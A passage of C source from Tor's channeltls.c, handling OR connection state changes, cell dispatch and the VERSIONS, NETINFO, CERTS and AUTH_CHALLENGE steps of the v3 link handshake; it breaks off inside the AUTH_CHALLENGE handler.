or_connection_t * ******************************************************/ /** * Handle an orconn state change * * This function will be called by connection_or.c when the or_connection_t * associated with this channel_tls_t changes state. 
*/ void channel_tls_handle_state_change_on_orconn(channel_t *chan, or_connection_t *conn, uint8_t old_state, uint8_t state) { tor_assert(chan); tor_assert(conn); tor_assert(conn->chan == chan); tor_assert(BASE_CHAN_TO_TLS(chan)->conn == conn); /* -Werror appeasement */ tor_assert(old_state == old_state); /* Make sure the base connection state makes sense - shouldn't be error, * closed or listening. */ tor_assert(chan->state == CHANNEL_STATE_OPENING || chan->state == CHANNEL_STATE_OPEN || chan->state == CHANNEL_STATE_MAINT || chan->state == CHANNEL_STATE_CLOSING); /* Did we just go to state open? */ if (state == OR_CONN_STATE_OPEN) { /* * We can go to CHANNEL_STATE_OPEN from CHANNEL_STATE_OPENING or * CHANNEL_STATE_MAINT on this. */ channel_change_state(chan, CHANNEL_STATE_OPEN); } else { /* * Not open, so from CHANNEL_STATE_OPEN we go to CHANNEL_STATE_MAINT, * otherwise no change. */ if (chan->state == CHANNEL_STATE_OPEN) { channel_change_state(chan, CHANNEL_STATE_MAINT); } } } /** * Flush cells from a channel_tls_t * * Try to flush up to about num_cells cells, and return how many we flushed. */ ssize_t channel_tls_flush_some_cells(channel_tls_t *chan, ssize_t num_cells) { ssize_t flushed = 0; tor_assert(chan); if (flushed >= num_cells) goto done; /* * If channel_tls_t ever buffers anything below the channel_t layer, flush * that first here. */ flushed += channel_flush_some_cells(TLS_CHAN_TO_BASE(chan), num_cells - flushed); /* * If channel_tls_t ever buffers anything below the channel_t layer, check * how much we actually got and push it on down here. */ done: return flushed; } /** * Check if a channel_tls_t has anything to flush * * Return true if there is any more to flush on this channel (cells in queue * or active circuits). */ int channel_tls_more_to_flush(channel_tls_t *chan) { tor_assert(chan); /* * If channel_tls_t ever buffers anything below channel_t, the * check for that should go here first. */ return channel_more_to_flush(TLS_CHAN_TO_BASE(chan)); } #ifdef KEEP_TIMING_STATS /** * Timing states wrapper * * This is a wrapper function around the actual function that processes the * <b>cell</b> that just arrived on <b>chan</b>. Increment <b>*time</b> * by the number of microseconds used by the call to <b>*func(cell, chan)</b>. */ static void channel_tls_time_process_cell(cell_t *cell, channel_tls_t *chan, or_connection_t *conn, int *time, void (*func)(cell_t *, channel_tls_t *)) { struct timeval start, end; long time_passed; tor_gettimeofday(&start); (*func)(cell, chan); tor_gettimeofday(&end); time_passed = tv_udiff(&start, &end) ; if (time_passed > 10000) { /* more than 10ms */ log_debug(LD_OR,"That call just took %ld ms.",time_passed/1000); } if (time_passed < 0) { log_info(LD_GENERAL,"That call took us back in time!"); time_passed = 0; } *time += time_passed; } #endif /** * Handle an incoming cell on a channel_tls_t * * This is called from connection_or.c to handle an arriving cell; it checks * for cell types specific to the handshake for this transport protocol and * handles them, and queues all other cells to the channel_t layer, which * eventually will hand them off to command.c. 
*/ void channel_tls_handle_cell(cell_t *cell, or_connection_t *conn) { channel_t *chan; int handshaking; #ifdef KEEP_TIMING_STATS #define PROCESS_CELL(tp, cl, cn, conn) STMT_BEGIN { \ ++num ## tp; \ channel_tls_time_process_cell(cl, cn, conn, & tp ## time , \ channel_tls_process_ ## tp ## _cell); \ } STMT_END #else #define PROCESS_CELL(tp, cl, cn, conn) channel_tls_process_ ## tp ## _cell(cl, cn, conn) #endif tor_assert(cell); tor_assert(conn); chan = conn->chan; if (!chan) { log_warn(LD_CHANNEL, "Got a cell_t on an OR connection with no channel"); return; } handshaking = (TO_CONN(conn)->state != OR_CONN_STATE_OPEN); if (conn->base_.marked_for_close) return; /* Reject all but VERSIONS and NETINFO when handshaking. */ /* (VERSIONS should actually be impossible; it's variable-length.) */ if (handshaking && cell->command != CELL_VERSIONS && cell->command != CELL_NETINFO) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received unexpected cell command %d in chan state %s / " "conn state %s; closing the connection.", (int)cell->command, channel_state_to_string(chan->state), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state)); connection_or_close_for_error(conn, 0); return; } if (conn->base_.state == OR_CONN_STATE_OR_HANDSHAKING_V3) or_handshake_state_record_cell(conn, conn->handshake_state, cell, 1); switch (cell->command) { case CELL_PADDING: ++stats_n_padding_cells_processed; /* do nothing */ break; case CELL_VERSIONS: tor_fragile_assert(); break; case CELL_NETINFO: ++stats_n_netinfo_cells_processed; PROCESS_CELL(netinfo, cell, chan, conn); break; case CELL_CREATE: case CELL_CREATE_FAST: case CELL_CREATED: case CELL_CREATED_FAST: case CELL_RELAY: case CELL_RELAY_EARLY: case CELL_DESTROY: case CELL_CREATE2: case CELL_CREATED2: case CELL_TRACK: /* * These are all transport independent and we pass them up through the * channel_t mechanism. They are ultimately handled in command.c. */ channel_queue_cell(chan, cell); break; default: log_fn(LOG_INFO, LD_PROTOCOL, "Cell of unknown type (%d) received in channeltls.c. " "Dropping.", cell->command); break; } } /** * Handle an incoming variable-length cell on a channel_tls_t * * Process a <b>var_cell</b> that was just received on <b>conn</b>. Keep * internal statistics about how many of each cell we've processed so far * this second, and the total number of microseconds it took to * process each type of cell. All the var_cell commands are handshake- * related and live below the channel_t layer, so no variable-length * cells ever get delivered in the current implementation, but I've left * the mechanism in place for future use. */ void channel_tls_handle_var_cell(var_cell_t *var_cell, or_connection_t *conn) { channel_t *chan; #ifdef KEEP_TIMING_STATS /* how many of each cell have we seen so far this second? needs better * name. 
*/ static int num_versions = 0, num_certs = 0; static time_t current_second = 0; /* from previous calls to time */ time_t now = time(NULL); if (current_second == 0) current_second = now; if (now > current_second) { /* the second has rolled over */ /* print stats */ log_info(LD_OR, "At end of second: %d versions (%d ms), %d certs (%d ms)", num_versions, versions_time / ((now - current_second) * 1000), num_certs, certs_time / ((now - current_second) * 1000)); num_versions = num_certs = 0; versions_time = certs_time = 0; /* remember which second it is, for next time */ current_second = now; } #endif tor_assert(var_cell); tor_assert(conn); chan = conn->chan; if (!chan) { log_warn(LD_CHANNEL, "Got a var_cell_t on an OR connection with no channel"); return; } if (TO_CONN(conn)->marked_for_close) return; switch (TO_CONN(conn)->state) { case OR_CONN_STATE_OR_HANDSHAKING_V2: if (var_cell->command != CELL_VERSIONS) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received a cell with command %d in unexpected " "orconn state \"%s\" [%d], channel state \"%s\" [%d]; " "closing the connection.", (int)(var_cell->command), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state), TO_CONN(conn)->state, channel_state_to_string(chan->state), (int)(chan->state)); /* * The code in connection_or.c will tell channel_t to close for * error; it will go to CHANNEL_STATE_CLOSING, and then to * CHANNEL_STATE_ERROR when conn is closed. */ connection_or_close_for_error(conn, 0); return; } break; case OR_CONN_STATE_TLS_HANDSHAKING: /* If we're using bufferevents, it's entirely possible for us to * notice "hey, data arrived!" before we notice "hey, the handshake * finished!" And we need to be accepting both at once to handle both * the v2 and v3 handshakes. */ /* fall through */ case OR_CONN_STATE_TLS_SERVER_RENEGOTIATING: if (!(command_allowed_before_handshake(var_cell->command))) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received a cell with command %d in unexpected " "orconn state \"%s\" [%d], channel state \"%s\" [%d]; " "closing the connection.", (int)(var_cell->command), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state), (int)(TO_CONN(conn)->state), channel_state_to_string(chan->state), (int)(chan->state)); /* see above comment about CHANNEL_STATE_ERROR */ connection_or_close_for_error(conn, 0); return; } else { if (enter_v3_handshake_with_cell(var_cell, chan, conn) < 0) return; } break; case OR_CONN_STATE_OR_HANDSHAKING_V3: if (var_cell->command != CELL_AUTHENTICATE) or_handshake_state_record_var_cell(conn, conn->handshake_state, var_cell, 1); break; /* Everything is allowed */ case OR_CONN_STATE_OPEN: if (conn->link_proto < 3) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received a variable-length cell with command %d in orconn " "state %s [%d], channel state %s [%d] with link protocol %d; " "ignoring it.", (int)(var_cell->command), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state), (int)(TO_CONN(conn)->state), channel_state_to_string(chan->state), (int)(chan->state), (int)(conn->link_proto)); return; } break; default: log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received var-length cell with command %d in unexpected " "orconn state \"%s\" [%d], channel state \"%s\" [%d]; " "ignoring it.", (int)(var_cell->command), conn_state_to_string(CONN_TYPE_OR, TO_CONN(conn)->state), (int)(TO_CONN(conn)->state), channel_state_to_string(chan->state), (int)(chan->state)); return; } /* Now handle the cell */ switch (var_cell->command) { case CELL_VERSIONS: ++stats_n_versions_cells_processed; PROCESS_CELL(versions, var_cell, 
chan, conn);
      break;
    case CELL_VPADDING:
      ++stats_n_vpadding_cells_processed;
      /* Do nothing */
      break;
    case CELL_CERTS:
      ++stats_n_certs_cells_processed;
      PROCESS_CELL(certs, var_cell, chan, conn);
      break;
    case CELL_AUTH_CHALLENGE:
      ++stats_n_auth_challenge_cells_processed;
      PROCESS_CELL(auth_challenge, var_cell, chan, conn);
      break;
    case CELL_AUTHENTICATE:
      ++stats_n_authenticate_cells_processed;
      PROCESS_CELL(authenticate, var_cell, chan, conn);
      break;
    case CELL_AUTHORIZE:
      ++stats_n_authorize_cells_processed;
      /* Ignored so far. */
      break;
    default:
      log_fn(LOG_INFO, LD_PROTOCOL,
             "Variable-length cell of unknown type (%d) received.",
             (int)(var_cell->command));
      break;
  }
}

/**
 * Attach an or_connection_t to a channel_tls_t.
 */

void
channel_tls_add_connection(channel_t *chan, or_connection_t *conn)
{
  tor_assert(chan);
  tor_assert(conn);

  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);
  tlschan->conn = conn;
}

/**
 * Detach an or_connection_t from a channel_tls_t and tell the channel
 * layer that its lower layer has gone away.
 */

void
channel_tls_remove_connection(channel_t *chan, or_connection_t *conn)
{
  tor_assert(chan);
  tor_assert(conn);

  if (chan->magic != TLS_CHAN_MAGIC) {
    log_warn(LD_CHANNEL,
             "channel %p: magic value incorrect, channel has most likely "
             "been freed, skipping", chan);
    return;
  }

  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  /* Don't transition if we're already in closing, closed or error */
  if (!(chan->state == CHANNEL_STATE_CLOSING ||
        chan->state == CHANNEL_STATE_CLOSED ||
        chan->state == CHANNEL_STATE_ERROR)) {
    channel_close_from_lower_layer(chan);
  } else {
    channel_closed(chan);
  }

  tlschan->conn = NULL;
}

/**
 * Tell the underlying or_connection_t to start writing if it isn't
 * doing so already.
 */

void
channel_tls_start_writing(channel_t *chan)
{
  tor_assert(chan);

  channel_tls_t *tlschan = BASE_CHAN_TO_TLS(chan);

  if (!connection_is_writing(TO_CONN(tlschan->conn))) {
    /* autotuning, libevent will tell us to add to pending queue */
    connection_start_writing(TO_CONN(tlschan->conn));
  }
}

/**
 * Check if this cell type is allowed before the handshake is finished
 *
 * Return true if <b>command</b> is a cell command that's allowed to start a
 * V3 handshake.
 */

static int
command_allowed_before_handshake(uint8_t command)
{
  switch (command) {
    case CELL_VERSIONS:
    case CELL_VPADDING:
    case CELL_AUTHORIZE:
      return 1;
    default:
      return 0;
  }
}

/**
 * Start a V3 handshake on an incoming connection
 *
 * Called when we as a server receive an appropriate cell while waiting
 * either for a cell or a TLS handshake.  Set the connection's state to
 * "handshaking_v3", initialize the or_handshake_state field as needed,
 * and add the cell to the hash of incoming cells.
 */

static int
enter_v3_handshake_with_cell(var_cell_t *cell,
                             channel_t *chan,
                             or_connection_t *conn)
{
  int started_here = 0;

  tor_assert(cell);
  tor_assert(chan);
  tor_assert(conn);

  started_here = connection_or_nonopen_was_started_here(conn);

  tor_assert(TO_CONN(conn)->state == OR_CONN_STATE_TLS_HANDSHAKING ||
             TO_CONN(conn)->state ==
               OR_CONN_STATE_TLS_SERVER_RENEGOTIATING);

  if (started_here) {
    log_fn(LOG_PROTOCOL_WARN, LD_OR,
           "Received a cell while TLS-handshaking, not in "
           "OR_HANDSHAKING_V3, on a connection we originated.");
  }

  connection_or_block_renegotiation(conn);
  conn->base_.state = OR_CONN_STATE_OR_HANDSHAKING_V3;
  if (connection_init_or_handshake_state(conn, started_here) < 0) {
    connection_or_close_for_error(conn, 0);
    return -1;
  }
  or_handshake_state_record_var_cell(conn, conn->handshake_state, cell, 1);

  return 0;
}

/**
 * Process a 'versions' cell.
 *
 * This function is called to handle an incoming VERSIONS cell; the current
 * link protocol version must be 0 to indicate that no version has yet been
 * negotiated.
We compare the versions in the cell to the list of versions * we support, pick the highest version we have in common, and continue the * negotiation from there. */ static void channel_tls_process_versions_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn) { int highest_supported_version = 0; const uint8_t *cp, *end; int started_here = 0; tor_assert(cell); tor_assert(chan); tor_assert(conn); if ((cell->payload_len % 2) == 1) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Received a VERSION cell with odd payload length %d; " "closing connection.",cell->payload_len); connection_or_close_for_error(conn, 0); return; } started_here = connection_or_nonopen_was_started_here(conn); if (conn->link_proto != 0 || (conn->handshake_state && conn->handshake_state->received_versions)) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Received a VERSIONS cell on a connection with its version " "already set to %d; dropping", (int)(conn->link_proto)); return; } switch (conn->base_.state) { case OR_CONN_STATE_OR_HANDSHAKING_V2: case OR_CONN_STATE_OR_HANDSHAKING_V3: break; case OR_CONN_STATE_TLS_HANDSHAKING: case OR_CONN_STATE_TLS_SERVER_RENEGOTIATING: default: log_fn(LOG_PROTOCOL_WARN, LD_OR, "VERSIONS cell while in unexpected state"); return; } tor_assert(conn->handshake_state); end = cell->payload + cell->payload_len; for (cp = cell->payload; cp+1 < end; cp += 2) { uint16_t v = ntohs(get_uint16(cp)); if (is_or_protocol_version_known(v) && v > highest_supported_version) highest_supported_version = v; } if (!highest_supported_version) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Couldn't find a version in common between my version list and the " "list in the VERSIONS cell; closing connection."); connection_or_close_for_error(conn, 0); return; } else if (highest_supported_version == 1) { /* Negotiating version 1 makes no sense, since version 1 has no VERSIONS * cells. */ log_fn(LOG_PROTOCOL_WARN, LD_OR, "Used version negotiation protocol to negotiate a v1 connection. " "That's crazily non-compliant. Closing connection."); connection_or_close_for_error(conn, 0); return; } else if (highest_supported_version < 3 && conn->base_.state == OR_CONN_STATE_OR_HANDSHAKING_V3) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Negotiated link protocol 2 or lower after doing a v3 TLS " "handshake. Closing connection."); connection_or_close_for_error(conn, 0); return; } else if (highest_supported_version != 2 && conn->base_.state == OR_CONN_STATE_OR_HANDSHAKING_V2) { /* XXXX This should eventually be a log_protocol_warn */ log_fn(LOG_WARN, LD_OR, "Negotiated link with non-2 protocol after doing a v2 TLS " "handshake with %s. Closing connection.", fmt_addr(&conn->base_.addr)); connection_or_close_for_error(conn, 0); return; } conn->link_proto = highest_supported_version; conn->handshake_state->received_versions = 1; if (conn->link_proto == 2) { log_info(LD_OR, "Negotiated version %d with %s:%d; sending NETINFO.", highest_supported_version, safe_str_client(conn->base_.address), conn->base_.port); if (connection_or_send_netinfo(conn) < 0) { connection_or_close_for_error(conn, 0); return; } } else { const int send_versions = !started_here; /* If we want to authenticate, send a CERTS cell */ const int send_certs = !started_here || public_server_mode(get_options()); /* If we're a host that got a connection, ask for authentication. */ const int send_chall = !started_here; /* If our certs cell will authenticate us, we can send a netinfo cell * right now. 
*/
    const int send_netinfo = !started_here;
    const int send_any =
      send_versions || send_certs || send_chall || send_netinfo;
    tor_assert(conn->link_proto >= 3);

    log_info(LD_OR,
             "Negotiated version %d with %s:%d; %s%s%s%s%s",
             highest_supported_version,
             safe_str_client(conn->base_.address),
             conn->base_.port,
             send_any ? "Sending cells:" : "Waiting for CERTS cell",
             send_versions ? " VERSIONS" : "",
             send_certs ? " CERTS" : "",
             send_chall ? " AUTH_CHALLENGE" : "",
             send_netinfo ? " NETINFO" : "");

#ifdef DISABLE_V3_LINKPROTO_SERVERSIDE
    if (1) {
      connection_or_close_normally(conn, 1);
      return;
    }
#endif

    if (send_versions) {
      if (connection_or_send_versions(conn, 1) < 0) {
        log_warn(LD_OR, "Couldn't send versions cell");
        connection_or_close_for_error(conn, 0);
        return;
      }
    }

    /* We set this after sending the versions cell. */
    /*XXXXX symbolic const.*/
    chan->wide_circ_ids =
      conn->link_proto >= MIN_LINK_PROTO_FOR_WIDE_CIRC_IDS;
    conn->wide_circ_ids = chan->wide_circ_ids;

    if (send_certs) {
      if (connection_or_send_certs_cell(conn) < 0) {
        log_warn(LD_OR, "Couldn't send certs cell");
        connection_or_close_for_error(conn, 0);
        return;
      }
    }

    if (send_chall) {
      if (connection_or_send_auth_challenge_cell(conn) < 0) {
        log_warn(LD_OR, "Couldn't send auth_challenge cell");
        connection_or_close_for_error(conn, 0);
        return;
      }
    }

    if (send_netinfo) {
      if (connection_or_send_netinfo(conn) < 0) {
        log_warn(LD_OR, "Couldn't send netinfo cell");
        connection_or_close_for_error(conn, 0);
        return;
      }
    }
  }
}

/**
 * Process a 'netinfo' cell
 *
 * This function is called to handle an incoming NETINFO cell; read and act
 * on its contents, and set the connection state to "open".
 */

static void
channel_tls_process_netinfo_cell(cell_t *cell, channel_t *chan,
                                 or_connection_t *conn)
{
  time_t timestamp;
  uint8_t my_addr_type;
  uint8_t my_addr_len;
  const uint8_t *my_addr_ptr;
  const uint8_t *cp, *end;
  uint8_t n_other_addrs;
  time_t now = time(NULL);

  long apparent_skew = 0;
  tor_addr_t my_apparent_addr = TOR_ADDR_NULL;

  tor_assert(cell);
  tor_assert(chan);
  tor_assert(conn);

  if (conn->link_proto < 2) {
    log_fn(LOG_PROTOCOL_WARN, LD_OR,
           "Received a NETINFO cell on %s connection; dropping.",
           conn->link_proto == 0 ? "a non-versioned" : "a v1");
    return;
  }

  if (conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V2 &&
      conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V3) {
    log_fn(LOG_PROTOCOL_WARN, LD_OR,
           "Received a NETINFO cell on non-handshaking connection; "
           "dropping.");
    return;
  }

  tor_assert(conn->handshake_state &&
             conn->handshake_state->received_versions);

  if (conn->base_.state == OR_CONN_STATE_OR_HANDSHAKING_V3) {
    tor_assert(conn->link_proto >= 3);

    if (conn->handshake_state->started_here) {
      if (!(conn->handshake_state->authenticated)) {
        log_fn(LOG_PROTOCOL_WARN, LD_OR,
               "Got a NETINFO cell from server, "
               "but no authentication.  Closing the connection.");
        connection_or_close_for_error(conn, 0);
        return;
      }
    } else {
      /* We're the server.  If the client never authenticated, we have
       * some housekeeping to do. */
      if (!(conn->handshake_state->authenticated)) {
        tor_assert(tor_digest_is_zero(
                   (const char*)(conn->handshake_state->
                                 authenticated_peer_id)));
        channel_set_circid_type(chan, NULL,
                                conn->link_proto <
                                  MIN_LINK_PROTO_FOR_WIDE_CIRC_IDS);

        connection_or_init_conn_from_address(conn,
                                             &(conn->base_.addr),
                                             conn->base_.port,
                                             (const char*)
                                             (conn->handshake_state->
                                              authenticated_peer_id),
                                             0);
      }
    }
  }

  /* Decode the cell.
*/ timestamp = ntohl(get_uint32(cell->payload)); if (labs(now - conn->handshake_state->sent_versions_at) < 180) { apparent_skew = now - timestamp; } my_addr_type = (uint8_t) cell->payload[4]; my_addr_len = (uint8_t) cell->payload[5]; my_addr_ptr = (uint8_t*) cell->payload + 6; end = cell->payload + CELL_PAYLOAD_SIZE; cp = cell->payload + 6 + my_addr_len; /* We used to check: * if (my_addr_len >= CELL_PAYLOAD_SIZE - 6) { * * This is actually never going to happen, since my_addr_len is at most 255, * and CELL_PAYLOAD_LEN - 6 is 503. So we know that cp is < end. */ if (my_addr_type == RESOLVED_TYPE_IPV4 && my_addr_len == 4) { tor_addr_from_ipv4n(&my_apparent_addr, get_uint32(my_addr_ptr)); } else if (my_addr_type == RESOLVED_TYPE_IPV6 && my_addr_len == 16) { tor_addr_from_ipv6_bytes(&my_apparent_addr, (const char *) my_addr_ptr); } n_other_addrs = (uint8_t) *cp++; while (n_other_addrs && cp < end-2) { /* Consider all the other addresses; if any matches, this connection is * "canonical." */ tor_addr_t addr; const uint8_t *next = decode_address_from_payload(&addr, cp, (int)(end-cp)); if (next == NULL) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Bad address in netinfo cell; closing connection."); connection_or_close_for_error(conn, 0); return; } if (tor_addr_eq(&addr, &(conn->real_addr))) { conn->is_canonical = 1; break; } cp = next; --n_other_addrs; } /* Act on apparent skew. */ /** Warn when we get a netinfo skew with at least this value. */ #define NETINFO_NOTICE_SKEW 3600 if (labs(apparent_skew) > NETINFO_NOTICE_SKEW && router_get_by_id_digest(conn->identity_digest)) { char dbuf[64]; int severity; /*XXXX be smarter about when everybody says we are skewed. */ if (router_digest_is_trusted_dir(conn->identity_digest)) severity = LOG_WARN; else severity = LOG_INFO; format_time_interval(dbuf, sizeof(dbuf), apparent_skew); log_fn(severity, LD_GENERAL, "Received NETINFO cell with skewed time from " "server at %s:%d. It seems that our clock is %s by %s, or " "that theirs is %s. Tor requires an accurate clock to work: " "please check your time and date settings.", conn->base_.address, (int)(conn->base_.port), apparent_skew > 0 ? "ahead" : "behind", dbuf, apparent_skew > 0 ? "behind" : "ahead"); if (severity == LOG_WARN) /* only tell the controller if an authority */ control_event_general_status(LOG_WARN, "CLOCK_SKEW SKEW=%ld SOURCE=OR:%s:%d", apparent_skew, conn->base_.address, conn->base_.port); } /* XXX maybe act on my_apparent_addr, if the source is sufficiently * trustworthy. */ if (! conn->handshake_state->sent_netinfo) { /* If we were prepared to authenticate, but we never got an AUTH_CHALLENGE * cell, then we would not previously have sent a NETINFO cell. Do so * now. */ if (connection_or_send_netinfo(conn) < 0) { connection_or_close_for_error(conn, 0); return; } } if (connection_or_set_state_open(conn) < 0) { log_fn(LOG_PROTOCOL_WARN, LD_OR, "Got good NETINFO cell from %s:%d; but " "was unable to make the OR connection become open.", safe_str_client(conn->base_.address), conn->base_.port); connection_or_close_for_error(conn, 0); } else { log_info(LD_OR, "Got good NETINFO cell from %s:%d; OR connection is now " "open, using protocol version %d. Its ID digest is %s. " "Our address is apparently %s.", safe_str_client(conn->base_.address), conn->base_.port, (int)(conn->link_proto), hex_str(chan->identity_digest, DIGEST_LEN), tor_addr_is_null(&my_apparent_addr) ? 
"<none>" : fmt_and_decorate_addr(&my_apparent_addr)); } assert_connection_ok(TO_CONN(conn),time(NULL)); } /** * Process a CERTS cell from a channel. * * This function is called to process an incoming CERTS cell on a * channel_tls_t: * * If the other side should not have sent us a CERTS cell, or the cell is * malformed, or it is supposed to authenticate the TLS key but it doesn't, * then mark the connection. * * If the cell has a good cert chain and we're doing a v3 handshake, then * store the certificates in or_handshake_state. If this is the client side * of the connection, we then authenticate the server or mark the connection. * If it's the server side, wait for an AUTHENTICATE cell. */ static void channel_tls_process_certs_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn) { tor_cert_t *link_cert = NULL; tor_cert_t *id_cert = NULL; tor_cert_t *auth_cert = NULL; uint8_t *ptr; int n_certs, i; int send_netinfo = 0; tor_assert(cell); tor_assert(chan); tor_assert(conn); #define ERR(s) \ do { \ log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, \ "Received a bad CERTS cell from %s:%d: %s", \ safe_str(conn->base_.address), \ conn->base_.port, (s)); \ connection_or_close_for_error(conn, 0); \ goto err; \ } while (0) if (conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V3) ERR("We're not doing a v3 handshake!"); if (conn->link_proto < 3) ERR("We're not using link protocol >= 3"); if (conn->handshake_state->received_certs_cell) ERR("We already got one"); if (conn->handshake_state->authenticated) { /* Should be unreachable, but let's make sure. */ ERR("We're already authenticated!"); } if (cell->payload_len < 1) ERR("It had no body"); if (cell->circ_id) ERR("It had a nonzero circuit ID"); n_certs = cell->payload[0]; ptr = cell->payload + 1; for (i = 0; i < n_certs; ++i) { uint8_t cert_type; uint16_t cert_len; if (ptr + 3 > cell->payload + cell->payload_len) { goto truncated; } cert_type = *ptr; cert_len = ntohs(get_uint16(ptr+1)); if (ptr + 3 + cert_len > cell->payload + cell->payload_len) { goto truncated; } if (cert_type == OR_CERT_TYPE_TLS_LINK || cert_type == OR_CERT_TYPE_ID_1024 || cert_type == OR_CERT_TYPE_AUTH_1024) { tor_cert_t *cert = tor_cert_decode(ptr + 3, cert_len); if (!cert) { log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, "Received undecodable certificate in CERTS cell from %s:%d", safe_str(conn->base_.address), conn->base_.port); } else { if (cert_type == OR_CERT_TYPE_TLS_LINK) { if (link_cert) { tor_cert_free(cert); ERR("Too many TLS_LINK certificates"); } link_cert = cert; } else if (cert_type == OR_CERT_TYPE_ID_1024) { if (id_cert) { tor_cert_free(cert); ERR("Too many ID_1024 certificates"); } id_cert = cert; } else if (cert_type == OR_CERT_TYPE_AUTH_1024) { if (auth_cert) { tor_cert_free(cert); ERR("Too many AUTH_1024 certificates"); } auth_cert = cert; } else { tor_cert_free(cert); } } } ptr += 3 + cert_len; continue; truncated: ERR("It ends in the middle of a certificate"); } if (conn->handshake_state->started_here) { int severity; if (! (id_cert && link_cert)) ERR("The certs we wanted were missing"); /* Okay. We should be able to check the certificates now. */ if (! tor_tls_cert_matches_key(conn->tls, link_cert)) { ERR("The link certificate didn't match the TLS public key"); } /* Note that this warns more loudly about time and validity if we were * _trying_ to connect to an authority, not necessarily if we _did_ connect * to one. */ if (router_digest_is_trusted_dir( chan->identity_digest)) severity = LOG_WARN; else severity = LOG_PROTOCOL_WARN; if (! 
tor_tls_cert_is_valid(severity, link_cert, id_cert, 0)) ERR("The link certificate was not valid"); if (! tor_tls_cert_is_valid(severity, id_cert, id_cert, 1)) ERR("The ID certificate was not valid"); conn->handshake_state->authenticated = 1; { const digests_t *id_digests = tor_cert_get_id_digests(id_cert); crypto_pk_t *identity_rcvd; if (!id_digests) ERR("Couldn't compute digests for key in ID cert"); identity_rcvd = tor_tls_cert_get_key(id_cert); if (!identity_rcvd) ERR("Internal error: Couldn't get RSA key from ID cert."); memcpy(conn->handshake_state->authenticated_peer_id, id_digests->d[DIGEST_SHA1], DIGEST_LEN); channel_set_circid_type(chan, identity_rcvd, conn->link_proto < MIN_LINK_PROTO_FOR_WIDE_CIRC_IDS); crypto_pk_free(identity_rcvd); } if (connection_or_client_learned_peer_id(conn, conn->handshake_state->authenticated_peer_id) < 0) ERR("Problem setting or checking peer id"); log_info(LD_OR, "Got some good certificates from %s:%d: Authenticated it.", safe_str(conn->base_.address), conn->base_.port); conn->handshake_state->id_cert = id_cert; id_cert = NULL; if (!public_server_mode(get_options())) { /* If we initiated the connection and we are not a public server, we * aren't planning to authenticate at all. At this point we know who we * are talking to, so we can just send a netinfo now. */ send_netinfo = 1; } } else { if (! (id_cert && auth_cert)) ERR("The certs we wanted were missing"); /* Remember these certificates so we can check an AUTHENTICATE cell */ if (! tor_tls_cert_is_valid(LOG_PROTOCOL_WARN, auth_cert, id_cert, 1)) ERR("The authentication certificate was not valid"); if (! tor_tls_cert_is_valid(LOG_PROTOCOL_WARN, id_cert, id_cert, 1)) ERR("The ID certificate was not valid"); log_info(LD_OR, "Got some good certificates from %s:%d: " "Waiting for AUTHENTICATE.", safe_str(conn->base_.address), conn->base_.port); /* XXXX check more stuff? */ conn->handshake_state->id_cert = id_cert; conn->handshake_state->auth_cert = auth_cert; id_cert = auth_cert = NULL; } conn->handshake_state->received_certs_cell = 1; if (send_netinfo) { if (connection_or_send_netinfo(conn) < 0) { log_warn(LD_OR, "Couldn't send netinfo cell"); connection_or_close_for_error(conn, 0); goto err; } } err: tor_cert_free(id_cert); tor_cert_free(link_cert); tor_cert_free(auth_cert); #undef ERR } /** * Process an AUTH_CHALLENGE cell from a channel_tls_t * * This function is called to handle an incoming AUTH_CHALLENGE cell on a * channel_tls_t; if we weren't supposed to get one (for example, because we're * not the originator of the channel), or it's ill-formed, or we aren't doing * a v3 handshake, mark the channel. If the cell is well-formed but we don't * want to authenticate, just drop it. If the cell is well-formed *and* we * want to authenticate, send an AUTHENTICATE cell and then a NETINFO cell. 
*/ static void channel_tls_process_auth_challenge_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn) { int n_types, i, use_type = -1; uint8_t *cp; tor_assert(cell); tor_assert(chan); tor_assert(conn); #define ERR(s) \ do { \ log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, \ "Received a bad AUTH_CHALLENGE cell from %s:%d: %s", \ safe_str(conn->base_.address), \ conn->base_.port, (s)); \ connection_or_close_for_error(conn, 0); \ return; \ } while (0) if (conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V3) ERR("We're not currently doing a v3 handshake"); if (conn->link_proto < 3) ERR("We're not using link protocol >= 3"); if (!(conn->handshake_state->started_here)) ERR("We didn't originate this connection"); if (conn->handshake_state->received_auth_challenge) ERR("We already received one"); if (!(conn->handshake_state->received_certs_cell)) ERR("We haven't gotten a CERTS cell yet"); if (cell->payload_len < OR_AUTH_CHALLENGE_LEN + 2) ERR("It was too short"); if (cell->circ_id) ERR("It had a nonzero circuit ID"); n_types = ntohs(get_uint16(cell->payload + OR_AUTH_CHALLENGE_LEN)); if (cell->payload_len < OR_AUTH_CHALLENGE_LEN + 2 + 2*n_types) ERR("It looks truncated"); /* Now see if there is an authentication type we can use */ cp = cell->payload+OR_AUTH_CHALLENGE_LEN + 2; for (i = 0; i < n_types; ++i, cp += 2) { uint16_t authtype = ntohs(get_uint16(cp)); if (authtype == AUTHTYPE_RSA_SHA256_TLSSECRET) use_type = authtype; } conn->handshake_state->received_auth_challenge = 1; if (! public_server_mode(get_options())) 